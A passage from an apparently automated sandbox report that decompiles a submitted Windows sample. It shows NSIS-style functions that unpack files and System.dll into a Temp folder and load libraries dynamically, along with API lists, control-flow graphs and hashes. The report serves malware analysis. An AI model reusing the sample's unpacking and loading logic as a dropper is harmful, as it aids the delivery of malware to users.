                                                                                                                • Not Executed
                                                                                                                control_flow_graph 540 401734-401757 call 4029f6 call 4056c6 545 401761-401773 call 405b66 call 405659 lstrcatA 540->545 546 401759-40175f call 405b66 540->546 551 401778-40177e call 405dc8 545->551 546->551 556 401783-401787 551->556 557 401789-401793 call 405e61 556->557 558 4017ba-4017bd 556->558 566 4017a5-4017b7 557->566 567 401795-4017a3 CompareFileTime 557->567 559 4017c5-4017e1 call 40583d 558->559 560 4017bf-4017c0 call 40581e 558->560 568 4017e3-4017e6 559->568 569 401859-401882 call 404f04 call 402f18 559->569 560->559 566->558 567->566 570 4017e8-40182a call 405b66 * 2 call 405b88 call 405b66 call 405427 568->570 571 40183b-401845 call 404f04 568->571 583 401884-401888 569->583 584 40188a-401896 SetFileTime 569->584 570->556 603 401830-401831 570->603 581 40184e-401854 571->581 586 402894 581->586 583->584 585 40189c-4018a7 FindCloseChangeNotification 583->585 584->585 588 40288b-40288e 585->588 589 4018ad-4018b0 585->589 590 402896-40289a 586->590 588->586 592 4018b2-4018c3 call 405b88 lstrcatA 589->592 593 4018c5-4018c8 call 405b88 589->593 599 4018cd-402209 592->599 593->599 604 40220e-402213 599->604 605 402209 call 405427 599->605 603->581 606 401833-401834 603->606 604->590 605->604 606->571
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029F6(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004056C6(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405659(E00405B66(0x409b70, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b70);
					E00405B66();
				}
				E00405DC8(0x409b70);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405E61(0x409b70);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040581E(0x409b70);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040583D(0x409b70, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404F04(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405B66(0x40a370, 0x424000);
						E00405B66(0x424000, 0x409b70);
						E00405B88(_t75, 0x40a370, 0x409b70, "C:\Users\hardz\AppData\Local\Temp\nsyA3E4.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405B66(0x424000, 0x40a370);
						_t62 = E00405427("C:\Users\hardz\AppData\Local\Temp\nsyA3E4.tmp\System.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b70);
								_push(0xfffffffa);
								E00404F04();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404F04(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F18(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405B88(_t75, _t80, 0x409b70, 0x409b70, 0xffffffee);
					} else {
						E00405B88(_t75, _t80, 0x409b70, 0x409b70, 0xffffffe9);
						lstrcatA(0x409b70,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b70);
					E00405427();
					goto L29;
				}
				goto L33;
			}
















                                                                                                                0x00401734
                                                                                                                0x0040173b
                                                                                                                0x00401744
                                                                                                                0x00401747
                                                                                                                0x0040174a
                                                                                                                0x0040174f
                                                                                                                0x00401757
                                                                                                                0x00401773
                                                                                                                0x00401759
                                                                                                                0x00401759
                                                                                                                0x0040175a
                                                                                                                0x0040175a
                                                                                                                0x00401779
                                                                                                                0x00401783
                                                                                                                0x00401783
                                                                                                                0x00401787
                                                                                                                0x0040178a
                                                                                                                0x0040178f
                                                                                                                0x00401791
                                                                                                                0x00401793
                                                                                                                0x00401798
                                                                                                                0x00401798
                                                                                                                0x004017a3
                                                                                                                0x004017a3
                                                                                                                0x004017b4
                                                                                                                0x004017b6
                                                                                                                0x004017b6
                                                                                                                0x004017b7
                                                                                                                0x004017b7
                                                                                                                0x004017ba
                                                                                                                0x004017bd
                                                                                                                0x004017c0
                                                                                                                0x004017c0
                                                                                                                0x004017c7
                                                                                                                0x004017d6
                                                                                                                0x004017db
                                                                                                                0x004017de
                                                                                                                0x004017e1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004017e3
                                                                                                                0x004017e6
                                                                                                                0x00401840
                                                                                                                0x00401845
                                                                                                                0x004015a8
                                                                                                                0x0040265c
                                                                                                                0x0040265c
                                                                                                                0x0040288b
                                                                                                                0x0040288e
                                                                                                                0x0040288e
                                                                                                                0x00000000
                                                                                                                0x004017e8
                                                                                                                0x004017ee
                                                                                                                0x004017f9
                                                                                                                0x00401806
                                                                                                                0x00401811
                                                                                                                0x00401827
                                                                                                                0x00401827
                                                                                                                0x0040182a
                                                                                                                0x00000000
                                                                                                                0x00401830
                                                                                                                0x00401830
                                                                                                                0x00401831
                                                                                                                0x0040184e
                                                                                                                0x00402894
                                                                                                                0x00402894
                                                                                                                0x00402894
                                                                                                                0x00401833
                                                                                                                0x00401833
                                                                                                                0x00401834
                                                                                                                0x00401492
                                                                                                                0x0040220e
                                                                                                                0x0040220e
                                                                                                                0x0040220e
                                                                                                                0x00401831
                                                                                                                0x0040182a
                                                                                                                0x00402896
                                                                                                                0x0040289a
                                                                                                                0x0040289a
                                                                                                                0x0040185e
                                                                                                                0x00401863
                                                                                                                0x00401871
                                                                                                                0x00401876
                                                                                                                0x0040187c
                                                                                                                0x00401880
                                                                                                                0x00401882
                                                                                                                0x0040188a
                                                                                                                0x00401896
                                                                                                                0x00401884
                                                                                                                0x00401884
                                                                                                                0x00401888
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00401888
                                                                                                                0x0040189f
                                                                                                                0x004018a5
                                                                                                                0x004018a7
                                                                                                                0x00000000
                                                                                                                0x004018ad
                                                                                                                0x004018ad
                                                                                                                0x004018b0
                                                                                                                0x004018c8
                                                                                                                0x004018b2
                                                                                                                0x004018b5
                                                                                                                0x004018be
                                                                                                                0x004018be
                                                                                                                0x004018cd
                                                                                                                0x004018d2
                                                                                                                0x00402209
                                                                                                                0x00000000
                                                                                                                0x00402209
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                                                                                                  • Part of subcall function 00405B66: lstrcpynA.KERNEL32(?,?,00000400,004032AA,004236A0,NSIS Error), ref: 00405B73
                                                                                                                  • Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                                  • Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                                  • Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                                                  • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                                  • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                                  • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                                  • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsyA3E4.tmp$C:\Users\user\AppData\Local\Temp\nsyA3E4.tmp\System.dll$Call
                                                                                                                • API String ID: 1941528284-3231606386
                                                                                                                • Opcode ID: f1aec3e14e8b53bfedf3a96745d118412ecf568f931b37f6426065c9993612ab
                                                                                                                • Instruction ID: ca24b6133afb507e547736dc5ab02d451b7f1a2d30e0a517c5ad6537af4b780a
                                                                                                                • Opcode Fuzzy Hash: f1aec3e14e8b53bfedf3a96745d118412ecf568f931b37f6426065c9993612ab
                                                                                                                • Instruction Fuzzy Hash: 8441C131900515BBCB10BFB5DD46EAF3A79EF01369B24433BF511B11E1D63C9A418AAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402F18, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 607 402f18-402f27 608 402f45-402f50 call 403043 607->608 609 402f29-402f3f SetFilePointer 607->609 612 402f56-402f70 ReadFile 608->612 613 40303c-403040 608->613 609->608 614 402f76-402f79 612->614 615 403039 612->615 614->615 616 402f7f-402f92 call 403043 614->616 617 40303b 615->617 616->613 620 402f98-402f9b 616->620 617->613 621 403008-40300e 620->621 622 402f9d-402fa0 620->622 623 403010 621->623 624 403013-403026 ReadFile 621->624 625 403034-403037 622->625 626 402fa6 622->626 623->624 624->615 627 403028-403031 624->627 625->613 628 402fab-402fb3 626->628 627->625 629 402fb5 628->629 630 402fb8-402fca ReadFile 628->630 629->630 630->615 631 402fcc-402fcf 630->631 631->615 632 402fd1-402fe6 WriteFile 631->632 633 403004-403006 632->633 634 402fe8-402feb 632->634 633->617 634->633 635 402fed-403000 634->635 635->628 636 403002 635->636 636->625
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E00402F18(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423ef8;
					 *0x417044 = _t44;
					SetFilePointer( *0x409018, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E00403043(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409018,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x417044 =  *0x417044 + _t57;
						_t32 = E00403043(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409018, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x417044 =  *0x417044 + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409018, 0x413040, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413040, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x417044 =  *0x417044 + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

















                                                                                                                0x00402f1d
                                                                                                                0x00402f27
                                                                                                                0x00402f30
                                                                                                                0x00402f34
                                                                                                                0x00402f3f
                                                                                                                0x00402f3f
                                                                                                                0x00402f47
                                                                                                                0x00402f49
                                                                                                                0x00402f50
                                                                                                                0x00402f6c
                                                                                                                0x00402f70
                                                                                                                0x00403039
                                                                                                                0x00403039
                                                                                                                0x00000000
                                                                                                                0x00402f7f
                                                                                                                0x00402f82
                                                                                                                0x00402f88
                                                                                                                0x00402f8f
                                                                                                                0x00402f92
                                                                                                                0x00402f9b
                                                                                                                0x00403008
                                                                                                                0x0040300e
                                                                                                                0x00403010
                                                                                                                0x00403010
                                                                                                                0x00403022
                                                                                                                0x00403026
                                                                                                                0x00000000
                                                                                                                0x00403028
                                                                                                                0x00403028
                                                                                                                0x0040302b
                                                                                                                0x00403031
                                                                                                                0x00000000
                                                                                                                0x00403031
                                                                                                                0x00402f9d
                                                                                                                0x00402fa0
                                                                                                                0x00403034
                                                                                                                0x00403034
                                                                                                                0x00402fa6
                                                                                                                0x00402fab
                                                                                                                0x00402fab
                                                                                                                0x00402fb3
                                                                                                                0x00402fb5
                                                                                                                0x00402fb5
                                                                                                                0x00402fc6
                                                                                                                0x00402fca
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402fde
                                                                                                                0x00402fe6
                                                                                                                0x00403004
                                                                                                                0x0040303b
                                                                                                                0x0040303b
                                                                                                                0x00402fed
                                                                                                                0x00402fed
                                                                                                                0x00402ff0
                                                                                                                0x00402ff3
                                                                                                                0x00402ff6
                                                                                                                0x00403000
                                                                                                                0x00000000
                                                                                                                0x00403002
                                                                                                                0x00000000
                                                                                                                0x00403002
                                                                                                                0x00403000
                                                                                                                0x00000000
                                                                                                                0x00402fe6
                                                                                                                0x00000000
                                                                                                                0x00402fab
                                                                                                                0x00402fa0
                                                                                                                0x00402f9b
                                                                                                                0x00402f92
                                                                                                                0x00402f70
                                                                                                                0x0040303c
                                                                                                                0x00403040

                                                                                                                APIs
                                                                                                                • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402F3F
                                                                                                                • ReadFile.KERNELBASE(00409130,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130), ref: 00402F6C
                                                                                                                • ReadFile.KERNELBASE(00413040,00004000,?,00000000,00409130,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402FC6
                                                                                                                • WriteFile.KERNELBASE(00000000,00413040,?,000000FF,00000000,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402FDE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Read$PointerWrite
                                                                                                                • String ID: @0A
                                                                                                                • API String ID: 2113905535-1363546919
                                                                                                                • Opcode ID: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
                                                                                                                • Instruction ID: f0f891dec1baa82fcb152a6e3a42d02399587e043c2e4755ce28507b82245ee9
                                                                                                                • Opcode Fuzzy Hash: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
                                                                                                                • Instruction Fuzzy Hash: 3F315731501249EBDB21CF55DD40A9E7FBCEB843A5F20407AFA05A6190D3789F81DBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403043, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 637 403043-40306c GetTickCount 638 403072-40309d call 4031f1 SetFilePointer 637->638 639 4031ad-4031b5 call 402bd3 637->639 645 4030a2-4030b4 638->645 644 4031b7-4031bc 639->644 646 4030b6 645->646 647 4030b8-4030c6 call 4031bf 645->647 646->647 650 4030cc-4030d8 647->650 651 40319f-4031a2 647->651 652 4030de-4030e4 650->652 651->644 653 4030e6-4030ec 652->653 654 40310f-40312b call 405f82 652->654 653->654 655 4030ee-40310e call 402bd3 653->655 660 4031a8 654->660 661 40312d-403135 654->661 655->654 662 4031aa-4031ab 660->662 663 403137-40314d WriteFile 661->663 664 403169-40316f 661->664 662->644 665 4031a4-4031a6 663->665 666 40314f-403153 663->666 664->660 667 403171-403173 664->667 665->662 666->665 668 403155-403161 666->668 667->660 669 403175-403188 667->669 668->652 670 403167 668->670 669->645 671 40318e-40319d SetFilePointer 669->671 670->669 671->639
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E00403043(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x417044; // 0x3e2a7
				_t37 = _t35 -  *0x40afb0 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BD3(1);
					return 0;
				}
				E004031F1( *0x41f054);
				SetFilePointer( *0x409018,  *0x40afb0, 0, 0); // executed
				 *0x41f050 = _t37;
				 *0x417040 = 0;
				while(1) {
					_t12 =  *0x417048; // 0x36984
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f054;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031BF(0x413040, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f054 =  *0x41f054 + _t34;
					 *0x40afd0 = 0x413040;
					 *0x40afd4 = _t34;
					L6:
					L6:
					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
						 *0x417040 =  *0x41f050 -  *0x417044 - _a4 +  *0x40afb0;
						E00402BD3(0);
					}
					 *0x40afd8 = 0x40b040;
					 *0x40afdc = 0x8000; // executed
					_t16 = E00405F82(0x40afb8); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40afd8; // 0x41268b
					_t40 = _t39 - 0x40b040;
					if(_t40 == 0) {
						__eflags =  *0x40afd4; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x417044; // 0x3e2a7
						if(_t18 -  *0x40afb0 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409018, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409018, 0x40b040, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40afb0 =  *0x40afb0 + _t40;
						_t53 =  *0x40afd4; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}


















                                                                                                                0x00403047
                                                                                                                0x00403054
                                                                                                                0x00403067
                                                                                                                0x0040306c
                                                                                                                0x004031ad
                                                                                                                0x004031af
                                                                                                                0x00000000
                                                                                                                0x004031b5
                                                                                                                0x00403078
                                                                                                                0x0040308b
                                                                                                                0x00403091
                                                                                                                0x00403097
                                                                                                                0x004030a2
                                                                                                                0x004030a2
                                                                                                                0x004030a7
                                                                                                                0x004030ac
                                                                                                                0x004030b4
                                                                                                                0x004030b6
                                                                                                                0x004030b6
                                                                                                                0x004030bf
                                                                                                                0x004030c6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004030cc
                                                                                                                0x004030d2
                                                                                                                0x004030d8
                                                                                                                0x00000000
                                                                                                                0x004030de
                                                                                                                0x004030e4
                                                                                                                0x00403104
                                                                                                                0x00403109
                                                                                                                0x0040310e
                                                                                                                0x00403114
                                                                                                                0x0040311a
                                                                                                                0x00403124
                                                                                                                0x0040312b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040312d
                                                                                                                0x00403133
                                                                                                                0x00403135
                                                                                                                0x00403169
                                                                                                                0x0040316f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403171
                                                                                                                0x00403173
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403175
                                                                                                                0x00403175
                                                                                                                0x00403188
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403197
                                                                                                                0x00000000
                                                                                                                0x00403197
                                                                                                                0x00403145
                                                                                                                0x0040314d
                                                                                                                0x004031a4
                                                                                                                0x004031aa
                                                                                                                0x004031aa
                                                                                                                0x00000000
                                                                                                                0x00403155
                                                                                                                0x00403155
                                                                                                                0x0040315b
                                                                                                                0x00403161
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403167
                                                                                                                0x004031a8
                                                                                                                0x004031a8
                                                                                                                0x00000000
                                                                                                                0x004031a8
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 00403058
                                                                                                                  • Part of subcall function 004031F1: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E9D,?), ref: 004031FF
                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000), ref: 0040308B
                                                                                                                • WriteFile.KERNELBASE(0040B040,0041268B,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403145
                                                                                                                • SetFilePointer.KERNELBASE(0003E2A7,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403197
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Pointer$CountTickWrite
                                                                                                                • String ID: @0A
                                                                                                                • API String ID: 2146148272-1363546919
                                                                                                                • Opcode ID: 5717bb92db8eceb84bcfa3312431b9880db34fb8e18b0e02550951cbdd57df69
                                                                                                                • Instruction ID: c862c83604f3b109b9ae356e59bf9e99270c6d64ee518f880403d0392c1b0dc8
                                                                                                                • Opcode Fuzzy Hash: 5717bb92db8eceb84bcfa3312431b9880db34fb8e18b0e02550951cbdd57df69
                                                                                                                • Instruction Fuzzy Hash: 4B41ABB25042029FD710CF29EE4096A7FBDF748356705423BE501BA2E1CB3C6E099B9E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 672 401f51-401f5d 673 401f63-401f79 call 4029f6 * 2 672->673 674 402019-40201b 672->674 683 401f88-401f96 LoadLibraryExA 673->683 684 401f7b-401f86 GetModuleHandleA 673->684 675 402164-402169 call 401423 674->675 681 40288b-40289a 675->681 686 401f98-401fa6 GetProcAddress 683->686 687 402012-402014 683->687 684->683 684->686 689 401fe5-401fea call 404f04 686->689 690 401fa8-401fae 686->690 687->675 695 401fef-401ff2 689->695 691 401fb0-401fbc call 401423 690->691 692 401fc7-401fde call 737516db 690->692 691->695 703 401fbe-401fc5 691->703 698 401fe0-401fe3 692->698 695->681 696 401ff8-402000 call 40364f 695->696 696->681 702 402006-40200d FreeLibrary 696->702 698->695 702->681 703->695
                                                                                                                C-Code - Quality: 60%
                                                                                                                			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423f28 =  *0x423f28 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E004029F6(0xfffffff0);
				 *(_t34 + 8) = E004029F6(1);
				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404F04(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, 0x424000, 0x40af70, " ?B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E0040364F(_t30) != 0) {
						FreeLibrary(_t30); // executed
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
